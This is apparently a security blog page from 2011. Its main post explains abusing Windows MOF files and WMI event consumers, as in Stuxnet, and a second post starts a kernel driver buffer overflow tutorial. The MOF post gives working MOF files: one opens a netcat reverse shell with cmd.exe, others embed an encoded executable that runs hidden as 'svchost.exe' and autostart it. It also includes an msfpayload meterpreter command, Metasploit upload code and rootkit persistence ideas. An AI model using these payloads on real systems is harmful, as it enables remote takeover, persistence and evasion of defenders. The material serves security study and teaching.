Sunday, September 18, 2011

Playing with MOF files on Windows, for fun & profit

In this article, we will focus on a high-level Windows feature that is not very well known and that can be interesting from an attacker's point of view. I will share my investigation of MOF files, from their use in Stuxnet - in the exploitation of a vulnerability in the Windows Printer Spooler - to some basic practical examples of what we can do with them.


1. Stuxnet and the Windows Printer Spooler vulnerability (MS10-061)

The Stuxnet worm embedded 4 different 0-days; an overall analysis is given by Symantec in [1]. Stuxnet has already been discussed a lot, and many good papers cover the different vulnerabilities it exploits. In particular, the paper [2] published in MISC magazine (in French) gives a good overview of the MS10-061 vulnerability in the Windows Printer Spooler.

Basically, this vulnerability allows remote code execution with SYSTEM privileges on a Windows XP machine if a printer is shared on the network. It was patched by Microsoft in September 2010 [3]. Other versions of Windows are also vulnerable, but only when very particular conditions are met, as summed up in [4] with the following figure:





Actually, when a printer is shared on the network on Windows XP, anybody can reach it as the Guest user in order to print documents. The "printer spooler service", which locally handles the requests from clients, runs in the spoolsv.exe process. It is possible to talk to it remotely over RPC (Remote Procedure Call). Stuxnet simply uses the methods implemented by the service to ask it to write a file to the machine's disk.

The article [2] explains in detail that a destination path for the written file can be specified through the StartDocPrinter API call, which notifies the spooler that a new job has arrived. In Stuxnet, the goal was to execute the payload after uploading it to a file on the remote machine. To do so, the authors used the Windows feature called WMI (Windows Management Instrumentation). So, we'll investigate this technology and see some interesting subtleties.

2. Windows Management Instrumentation (WMI)

Before practicing, we need a bit of theory about WMI. So I'll try to sum up my research on this Windows feature and give the concepts that are useful before we start playing with it.

According to [5], we learn that:
“WMI is an implementation of Web-Based Enterprise Management (WBEM) […]. The WBEM standard encompasses the design of an extensible enterprise data-collection and data-management facility that has the flexibility and extensibility required to manage local and remote systems that comprise arbitrary components”. “WMI consists of four main components: management applications, WMI infrastructure, providers, and managed objects (system, disks, processes, network components…)”. The following figure gives an overview of the architecture of WMI.

To sum up, it is an information exchange standard interface based on a client/server model:



... Well, the architecture is rather complex, let's try to dig into it...
First, at the center of the WMI architecture, we have the WMI Infrastructure which is composed of the CIMOM (Common Information Model Object Manager). It binds management applications - also called "consumers" - on the one hand and "providers" on the other hand. This object manager is also in relation with a repository (CIM/WMI repository) that stores CIM classes' definitions.

CIM classes are organized hierarchically, with subclasses that inherit from their parent class. CIM classes are grouped in namespaces, which are just logical groups of classes. For example, the namespace root\cimv2 includes most of the classes that represent the computer's resources. The language used to describe CIM classes is called MOF (Managed Object Format).

What is really interesting with WMI is that it can execute code when an event notification occurs. The event might be a program start, a user authentication, ... or any other Windows event. A MOF file needs to be registered into the CIM/WMI repository in order to be taken into account by WMI. When a MOF file is registered, the CIM class(es) it describes are added to the repository.

Let's see the classes that are interesting:
  • __EventFilter [6] [7]: defines a Windows event,
  • __EventConsumer [9]: defines a consumer. This class is actually an abstract class with several implementations. The most interesting one is ActiveScriptEventConsumer [8] because it makes it possible to embed VBScript or JScript in the consumer. Note that it is only available in the namespace root\subscription.
    The cool thing is that the consumer runs with SYSTEM privileges on Windows XP and Windows Server 2003. Under Vista, it runs as the LOCAL_SERVICE user. I haven't tried under Windows 7, maybe someone? =)
  • __FilterToConsumerBinding [10]: links the two other instances. In other words, it activates the consumer - and executes its code - whenever the defined event occurs.
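
To make the relationship between these three classes concrete, here is a small model written in Python rather than MOF. It is only a sketch: the names EventFilter, EventConsumer and Repository are hypothetical stand-ins, a plain Python predicate replaces the WQL query, and nothing here talks to WMI. It simply shows that a consumer's action runs only for events matched by a filter it has been bound to.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


@dataclass
class EventFilter:
    name: str
    matches: Callable[[Event], bool]  # stands in for the WQL query


@dataclass
class EventConsumer:
    name: str
    action: Callable[[Event], None]  # stands in for the consumer's script


@dataclass
class Repository:
    # Each entry plays the role of one __FilterToConsumerBinding instance.
    bindings: List[Tuple[EventFilter, EventConsumer]] = field(default_factory=list)

    def bind(self, flt: EventFilter, consumer: EventConsumer) -> None:
        self.bindings.append((flt, consumer))

    def deliver(self, event: Event) -> int:
        """Run every consumer whose bound filter matches; return how many ran."""
        fired = 0
        for flt, consumer in self.bindings:
            if flt.matches(event):
                consumer.action(event)
                fired += 1
        return fired


seen: List[str] = []
repo = Repository()
repo.bind(
    EventFilter("app_log", lambda e: e.get("LogFile") == "Application"),
    EventConsumer("recorder", lambda e: seen.append(e["Message"])),
)

repo.deliver({"LogFile": "System", "Message": "ignored"})
repo.deliver({"LogFile": "Application", "Message": "login failed"})
print(seen)  # ['login failed']
```

Without the binding, neither the filter nor the consumer does anything on its own, which is why all three instances appear in every MOF file later in this article.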



      As we learn in [11], MOF files are compiled into the WMI repository using mofcomp.exe. Moreover, a MOF file placed in the %SystemRoot%\System32\wbem\mof\ directory is automatically compiled and registered into the WMI repository. This directory is defined under the registry key HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\, as we can see here:


      Note: @jduck1337 pointed out to me that MOF files aren't auto-compiled on Vista and later.

      The file mofcomp.log located in %SystemRoot%\System32\wbem\mof\Logs\ contains the logs of MOF file compilations, as shown in the following screenshot:



      This auto-compilation feature was used by Stuxnet: 2 files were uploaded on the targeted remote machine using MS10-061:
      • %SystemRoot%\System32\winsta.exe: Stuxnet’s main module
      • %SystemRoot%\System32\wbem\mof\sysnullevnt.mof: MOF file that will automatically compile itself and that contains the code needed to execute the winsta.exe file when some events occur.

      Now, let's see MOF files in action with 3 fictitious examples.


      3. A basic example of MOF file

      Let's start with a basic MOF file: imagine that we want to launch an executable when some event occurs on the system. For illustration purposes, we'll launch the executable (here, Netcat for Windows) when a new log entry is added.

      So, we create a MOF file with a consumer (an instance of ActiveScriptEventConsumer) that executes a VBScript. This VBScript just creates a Shell object and executes netcat with the right parameters. We also define an event filter by instantiating the __EventFilter class, in order to define when the consumer is executed. For this example, the filter notifies the consumer when a new entry is added to the "Application" log.

      Event filters must use a SQL-like language called WQL (WMI Query Language) to define the Windows event(s) that will trigger the execution of the consumer [12].

      Here is what our first MOF file looks like:
      #pragma namespace ("\\\\.\\root\\subscription")
      
      instance of __EventFilter as $FILTER
      {
          Name = "CLASS_FIRST_TEST";
          EventNamespace = "root\\cimv2";
          Query = "SELECT * FROM __InstanceCreationEvent "
                  "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
                  "TargetInstance.LogFile=\"Application\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "CLASS_FIRST_TEST";
          ScriptingEngine = "VBScript";
      
          ScriptText =
            "Set objShell = CreateObject(\"WScript.Shell\")\n"
         "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 192.168.38.1 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };

      The example of use with netcat is taken from [15].

      Some explanations may be needed:
      • Firstly, the event filter defines the WQL query that selects the events. Once again, I referred to the MSDN to build the query. In WMI, a Windows event is represented by the abstract class __Event, which has many different subclasses. Here we use __InstanceCreationEvent [13].
      • Secondly, in the consumer we must specify in ScriptingEngine that we want to use VBScript, and then we just have to pass our script in ScriptText.
      • Thirdly, we bind the filter and the consumer.

      Okay, so in order to test our newly created MOF file, we just put it in the directory %SystemRoot%\System32\wbem\mof\. The instances are added to the repository. And we can confirm that when a new log entry is added - here, coming from a failed login attempt on MS SQL - the executable nc.exe is started. It runs with SYSTEM privileges, because I'm doing my tests on Windows Server 2003 SP2:


      It looks interesting, but it would be great to embed a payload directly into the MOF file. Let's see how to do this =)


      4. Embed a payload into a MOF file

      We have already seen that it's possible to put VBScript into an instance of ActiveScriptEventConsumer. So, we can directly put our payload encoded in VBScript!
      For example, it is possible to use msfencode with the option -t vbs in order to encode a shellcode in VBScript. Let's assume that we want to embed a reverse_tcp meterpreter (fictitious example) into a MOF file; we can use the following command:

      msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> R | msfencode -e generic/none -t vbs

      And then, we just need to put the generated VBScript into our MOF file (note that it's necessary to escape all the quotes):

      #pragma namespace ("\\\\.\\root\\subscription")
      
      instance of __EventFilter as $FILTER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\cimv2";
          Query = "SELECT * FROM __InstanceCreationEvent "
                  "WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
                  "TargetInstance.LogFile=\"Application\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
      
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(96)&Chr(46)&Chr(114)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(230)&Chr(15)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(64)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(92)&Chr(112)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(208)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(192) \n" 
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };

      Thanks to VBScript, we can actually put any executable into a MOF file.
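
When reviewing a MOF file like this one, it helps to turn the Chr() chain back into bytes to see what is really embedded. The Python sketch below is an analysis aid of my own, not part of msfencode: decode_chr_chain is a hypothetical helper that assumes the script only uses the Chr(n)&Chr(n)... form shown above. Applied to the beginning of the listing, it recovers the "MZ" magic of a Windows executable, and the tail of the first line decodes to the start of the DOS stub message.

```python
import re


def decode_chr_chain(expr: str) -> bytes:
    """Turn a VBScript 'Chr(77)&Chr(90)&...' expression into raw bytes."""
    return bytes(int(n) for n in re.findall(r"Chr\((\d+)\)", expr))


# First few values of the listing above.
header = decode_chr_chain("vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)")
print(header[:2] == b"MZ")  # True

# Values taken from the end of the same line of the listing.
stub = decode_chr_chain(
    "Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)"
    "&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)"
)
print(stub)  # b'This program'
```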

      In some circumstances, we might have a problem with the previous MOF files because the consumer isn't automatically started after its registration into the WMI repository. We'll now see a trick that can be used to overcome this.


      5. Consumer autostart after MOF file registration

      If we dig into the MSDN, we can see that the __InstanceCreationEvent class, which we have used so far in the WQL query, can also be used to filter on the creation of a new instance of a class in the WMI repository. The name of the class in question is compared against TargetInstance.__class.
      So, it is possible to use this feature to trigger the autostart of the consumer. Let's see what the new version of our MOF file looks like:

      #pragma namespace ("\\\\.\\root\\subscription")
      
      class WoootClass 
      {
          [key]
          string Name;
      };
      
      instance of __EventFilter as $FILTER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          EventNamespace = "root\\subscription";
          Query = "SELECT * FROM __InstanceCreationEvent "
                  "WHERE TargetInstance.__class = \"WoootClass\"";
      
          QueryLanguage = "WQL";
      };
      
      instance of ActiveScriptEventConsumer as $CONSUMER
      {
          Name = "XPLOIT_TEST_SYSTEM";
          ScriptingEngine = "VBScript";
          ScriptText = "Function jcmNPtWMUEOI() \n"
      "vURTl=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) \n"
      // [...]
      "vURTl=vURTl&Chr(98)&Chr(0) \n"
      "Dim eXmdsyLFEs \n"
      "Set eXmdsyLFEs = CreateObject(\"Scripting.FileSystemObject\") \n"
      "Dim TxNAbBlYJ \n"
      "Dim OnzEldZtxrMeY \n"
      "Dim YzlWLAgbdcsRP \n"
      "Dim gpvFZLaXwIZzKCJ \n"
      "Set OnzEldZtxrMeY = eXmdsyLFEs.GetSpecialFolder(2) \n"
      "gpvFZLaXwIZzKCJ = OnzEldZtxrMeY & \"\\\" & eXmdsyLFEs.GetTempName() \n"
      "eXmdsyLFEs.CreateFolder(gpvFZLaXwIZzKCJ) \n"
      "YzlWLAgbdcsRP = gpvFZLaXwIZzKCJ & \"\\\" & \"svchost.exe\" \n"
      "Set TxNAbBlYJ = eXmdsyLFEs.CreateTextFile(YzlWLAgbdcsRP,2,0) \n"
      "TxNAbBlYJ.Write vURTl \n"
      "TxNAbBlYJ.Close \n"
      "Dim VvLFolkbOsQvlf \n"
      "Set VvLFolkbOsQvlf = CreateObject(\"Wscript.Shell\") \n"
      "VvLFolkbOsQvlf.run YzlWLAgbdcsRP, 0, true \n"
      "eXmdsyLFEs.DeleteFile(YzlWLAgbdcsRP) \n"
      "eXmdsyLFEs.DeleteFolder(gpvFZLaXwIZzKCJ) \n"
      "End Function \n"
      "jcmNPtWMUEOI \n";        
      };
      
      instance of __FilterToConsumerBinding
      {
          Consumer = $CONSUMER ;
          Filter = $FILTER ;
      };
      
      instance of WoootClass
      {
          Name = "Woot";
      };
      

      As you can see, I have just added a new class called "WoootClass" at the beginning of the MOF file. This class does nothing by itself, but it is instantiated at the end of the file. So after registration into the WMI repository, this instantiation automatically triggers the filter, which in turn triggers the consumer containing our payload!

      This trick therefore runs the consumer automatically. It can be very useful in situations where we don't want to wait for a Windows event.


      6. Interest

      It is important to remember that the MOF self-install directory is of course only writable by an Administrator. That's why MOF files are really interesting in two kinds of situations:
      1. When we are able to upload a file to a remote machine, into an arbitrary destination path (with Administrator privileges, in order to be able to write into the MOF self-install directory). This is the case of MS10-061 with the StartDocPrinter API.

      2. In a post-exploitation context, when we have already escalated our privileges to Administrator on a Windows machine.

      The first situation is of course relatively rare. Nevertheless, it's interesting to notice that Metasploit provides a function generate_mof() in the file lib/msf/core/exploit/wbemexec.rb. This function uses the trick described in this article to autostart the consumer. For example, it is used by the exploit of MS10-061: exploits/windows/smb/ms10_061_spoolss [13].

      The psexec module (modules/exploits/windows/smb/psexec) also uses it when MOF_UPLOAD_METHOD is selected, as we can see in the following code snippet:
      if datastore['MOF_UPLOAD_METHOD']
         # payload as exe
         print_status("Trying wbemexec...")
         print_status("Uploading Payload...")
         if datastore['SHARE'] != 'ADMIN$'
          print_error('Wbem will only work with ADMIN$ share')
          return
         end
         simple.connect("ADMIN$")
         filename = rand_text_alpha(8) + ".exe"
         exe = generate_payload_exe
         fd = smb_open("\\system32\\#{filename}", 'rwct')
         fd << exe
         fd.close
         print_status("Created %SystemRoot%\\system32\\#{filename}")
      
         # mof to cause execution of above
         mofname = rand_text_alphanumeric(14) + ".MOF"
         mof = generate_mof(mofname, filename)
         print_status("Uploading MOF...")
         fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
         fd << mof
         fd.close
         print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
      
         # Disconnect from the ADMIN$
         simple.disconnect("ADMIN$")   
      

      In a post-exploitation context, I think that MOF files can provide an original way to hide malicious code in the WMI repository. The possibilities are almost infinite because we can basically say: "When _this_ event occurs, just do _that_!". So, we can for example use MOF files with a backdoor or a rootkit in order to:

      • Automatically kill some processes as soon as they are launched (anti-rootkits...),
      • Automatically detect when the backdoor/rootkit has been deleted to load it again (dropper),
      • Automatically infect USB devices,
      • ...
      What is interesting here is that it shows how high-level features provided by the system can be abused by an attacker. Classes hidden in the WMI repository are not likely to be detected quickly, because this technology is not very well known by users and is rarely checked.

      However, it is still possible to detect malicious classes with a tool like WMI Object Browser from WMI Administrative Tools [14], which lets us explore the repository:


      Of course, giving the classes names that look legitimate is likely to trick some curious users =)
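
On the defensive side, the same idea can be applied to MOF source files found on disk (for example in the self-install directory). The following Python sketch is only an illustration under stated assumptions: audit_mof is a hypothetical helper, it works on plain text with a regular expression rather than a real MOF parser, and treating ActiveScriptEventConsumer and CommandLineEventConsumer instances as "worth a look" is my own heuristic, not an official rule. Since it inspects class names and not instance names, a legitimate-looking Name does not hide the consumer type.

```python
import re

# Consumer classes able to run scripts or commands (heuristic of this sketch).
SCRIPT_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
INSTANCE_RE = re.compile(r"instance\s+of\s+(\w+)", re.IGNORECASE)


def audit_mof(text: str) -> dict:
    """Summarize the instance declarations found in MOF source text."""
    classes = INSTANCE_RE.findall(text)
    return {
        "instances": classes,
        "script_consumers": [c for c in classes if c in SCRIPT_CONSUMERS],
        "has_binding": "__FilterToConsumerBinding" in classes,
    }


# Harmless sample with the same structure as the MOF files in this article.
SAMPLE = """
instance of __EventFilter as $FILTER { Name = "demo"; };
instance of ActiveScriptEventConsumer as $CONSUMER { Name = "demo"; };
instance of __FilterToConsumerBinding { Consumer = $CONSUMER; Filter = $FILTER; };
"""

report = audit_mof(SAMPLE)
print(report["script_consumers"])  # ['ActiveScriptEventConsumer']
print(report["has_binding"])       # True
```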


      References 

      [1] W32.Stuxnet Dossier, by Symantec
      http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf

      [2] MS10-061 vulnerability in Windows Printer Spooler, MISC Magazine issue #53 (french), by ivanlef0u

      [3] Microsoft Security Bulletin MS10-061
      http://technet.microsoft.com/en-us/security/bulletin/MS10-061

      [4] MS10-061: Printer Spooler vulnerability
      http://blogs.technet.com/b/srd/archive/2010/09/14/ms10-061-printer-spooler-vulnerability.aspx

      [5] Windows Internals, book by Mark Russinovich & David Solomon

      [6] __EventFilter class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394639%28v=vs.85%29.aspx

      [7] Creating an Event Filter, MSDN
      http://msdn.microsoft.com/en-us/library/aa389741%28VS.85%29.aspx

      [8] ActiveScriptEventConsumer class, MSDN
      http://msdn.microsoft.com/en-us/library/aa384749%28VS.85%29.aspx

      [9] __EventConsumer class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394635

      [10] __FilterToConsumerBinding class, MSDN
      http://msdn.microsoft.com/en-us/library/aa394647%28v=VS.85%29.aspx

      [11] Managed Object Format (MOF), MSDN
      http://msdn.microsoft.com/en-us/library/aa823192%28VS.85%29.aspx

      [12] Querying with WQL (SQL for WMI), MSDN
      http://msdn.microsoft.com/en-us/library/aa392902%28v=VS.85%29.aspx

      [13] exploits/windows/smb/ms10_061_spoolss code, Metasploit Framework
      http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/smb/ms10_061_spoolss.rb 

      [14] WMI Administrative Tools, Microsoft
      http://www.microsoft.com/download/en/details.aspx?id=24045

      [15] Newsletter HSC #77, Article about MOF/WMI (french), by Stephane Milani (sorry for forgetting)
      http://www.hsc-news.com/archives/2011/000078.html

      Greetz to
      @Heurs for the idea to dig into MS10-061 =)

      Sunday, July 17, 2011

      Windows Kernel Exploitation Basics - Part 4 : Stack-based Buffer Overflow exploitation (bypassing cookie)



      In this article, we'll exploit the stack-based buffer overflow that is present in the DVWDDriver when we pass an oversized buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The concept of buffer overflow in kernelland is the same as in userland. Basically, we've got a buffer that sits in kernelland and we are able to overflow it, here because the function RtlCopyMemory() is misused, as we've seen in the first article of this series.
      First of all, we'll see how to detect such a vulnerability in a driver, and then we'll go through the exploitation process, based on the information given in the book "A Guide to Kernel Exploitation" and on some papers that have been released on the topic.

      1. Triggering the vulnerability

      In order to trigger the vulnerability, I've made this small piece of code:
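      /* Required headers */
      #include <windows.h>
      #include <winioctl.h>
      #include <stdio.h>
      #include <string.h>
      #include <conio.h>
      
      /* IOCTL */
      #define DEVICEIO_DVWD_STACKOVERFLOW  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 
      
      int main(int argc, char *argv[]) {
       
       char junk[512];
       HANDLE hDevice;
       DWORD bytesReturned = 0; /* must be non-NULL when lpOverlapped is NULL */
       
       printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");
       
       printf("[~] Building junk data to send to the driver...\n");
       memset(junk, 'A', 511);
       junk[511] = '\0';
       
       printf("[~] Open a handle to the driver DVWD...\n");
       hDevice = CreateFile("\\\\.\\DVWD", 
          GENERIC_READ | GENERIC_WRITE, 
          FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
          NULL, 
          OPEN_EXISTING, 
          0, 
          NULL);
       if (hDevice == INVALID_HANDLE_VALUE) {
        /* The driver is not loaded or the device name is wrong */
        printf("[!] CreateFile failed (error %lu)\n", GetLastError());
        return 1;
       }
       printf("\tHandle: %p\n",hDevice);
       getch();
       
       printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
       /* The length passed is strlen(junk), i.e. 511 bytes */
       DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, junk, (DWORD)strlen(junk), NULL, 0, &bytesReturned, NULL);
      
       
       CloseHandle(hDevice);
       return 0;
      }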
      

      The code is straightforward: it just sends a 512-byte buffer of junk data (actually 511 'A' + '\0'; the length passed to the driver is strlen(junk), so 511 bytes). This is more than enough to overflow the buffer used by the driver, which is only 64 bytes long =)
      Okay, so let's compile and run the previous code, here's what we get:


      BOOM! A nice Blue Screen Of Death!

      Now, we'll attach the Windows VM used for the tests to a remote kernel debugger, that is actually running in another Windows VM. All the details about how to set up remote debugging using VMWare are given in the article [1].

      We run the code again, and the Windows VM freezes after sending the buffer to the driver:



      ... Meanwhile, the remote kernel debugger detects the "fatal system error":

      *** Fatal System Error: 0x000000f7
                             (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)
      
      Break instruction exception - code 80000003 (first chance)
      
      A fatal system error has occurred.
      Debugger entered on first try; Bugcheck callbacks have not been invoked.
      
      A fatal system error has occurred.
      

      To have more information (a dump), we type !analyze -v, and we get:

      kd> !analyze -v
      *******************************************************************************
      *                                                                             *
      *                        Bugcheck Analysis                                    *
      *                                                                             *
      *******************************************************************************
      
      DRIVER_OVERRAN_STACK_BUFFER (f7)
      A driver has overrun a stack-based buffer.  This overrun could potentially
      allow a malicious user to gain control of this machine.
      DESCRIPTION
      A driver overran a stack-based buffer (or local variable) in a way that would
      have overwritten the function's return address and jumped back to an arbitrary
      address when the function returned.  This is the classic "buffer overrun"
      hacking attack and the system has been brought down to prevent a malicious user
      from gaining complete control of it.
      Do a kb to get a stack backtrace -- the last routine on the stack before the
      buffer overrun handlers and bugcheck call is the one that overran its local
      variable(s).
      Arguments:
      Arg1: b497bd51, Actual security check cookie from the stack
      Arg2: f786c6ea, Expected security check cookie
      Arg3: 08793915, Complement of the expected security check cookie
      Arg4: 00000000, zero
      
      Debugging Details:
      ------------------
      
      
      DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME
      
      SECURITY_COOKIE:  Expected f786c6ea found b497bd51
      
      BUGCHECK_STR:  0xF7
      
      PROCESS_NAME:  fuzzIOCTL.EXE
      
      CURRENT_IRQL:  0
      
      LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70
      
      STACK_TEXT:
      f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
      f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
      f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
      f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
      WARNING: Stack unwind information not available. Following frames may be wrong.
      f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
      f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
      f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
      f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
      [...]
      f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
      f5d6fd24 41414141 41414141 41414141 41414141 0x41414141
      
      
      STACK_COMMAND:  kb
      
      FOLLOWUP_IP:
      DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      f7858662 cc              int     3
      
      SYMBOL_STACK_INDEX:  4
      
      SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      
      FOLLOWUP_NAME:  MachineOwner
      
      MODULE_NAME: DVWDDriver
      
      IMAGE_NAME:  DVWDDriver.sys
      
      DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5
      
      FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      
      BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
      

